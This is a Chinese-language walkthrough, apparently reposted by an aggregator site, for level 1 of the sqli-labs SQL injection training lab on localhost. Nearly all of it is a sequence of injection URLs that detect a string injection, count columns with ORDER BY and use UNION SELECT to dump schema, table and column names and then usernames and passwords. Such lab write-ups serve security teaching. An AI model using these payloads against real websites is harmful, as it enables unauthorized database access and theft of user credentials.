sqli-labs-master 第一关
Posted 燕钰达
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs-master 第一关相关的知识,希望对你有一定的参考价值。
注:如未接触过sql注入,建议观看前期知识点文章 https://www.cnblogs.com/yyd-sun/p/12256407.html
第一关步骤
一、判断注入类型(数字/字符)
(1)、http://localhost/sqli-labs-master/Less-1/?id=1 结果正常
(2)、http://localhost/sqli-labs-master/Less-1/?id=1\' 报错
(3)、http://localhost/sqli-labs-master/Less-1/?id=1\'--+ 结果正常
结果说明是字符注入。
二、猜解SQL查询语句中的字段数
http://localhost/sqli-labs-master/Less-1/?id=1\'order by 4 --+
http://localhost/sqli-labs-master/Less-1/?id=1\'order by 3 --+
结果显示字段数为3
三、确定回显的字段数
http://localhost/sqli-labs-master/Less-1/?id=-1\'union select 1,2,3--+
结果显示 回显字段为2、3
四、获取当前数据库
http://localhost/sqli-labs-master/Less-1/?id=-1\'union select 1,2,group_concat(schema_name) from information_schema.schemata--+
| information_schema |
| challenges |
| dvwa |
| jokedb |
| mysql |
| pikachu |
| pkxss |
| security |
| test |
五、获取security库的表名
http://localhost/sqli-labs-master/Less-1/?id=-1\'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
| emails |
| referers |
| uagents |
| users |
六、查users表字段
http://localhost/sqli-labs-master/Less-1/?id=-1\'union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+
七、查询users表的id,username,password
http://localhost/sqli-labs-master/Less-1/?id=-1\'union select 1,2,group_concat(concat_ws(0x2d2d,id,username,password)) from security.users--+
以上是关于sqli-labs-master 第一关的主要内容,如果未能解决你的问题,请参考以下文章
sqli-labs-master第二关:Error Based- Intiger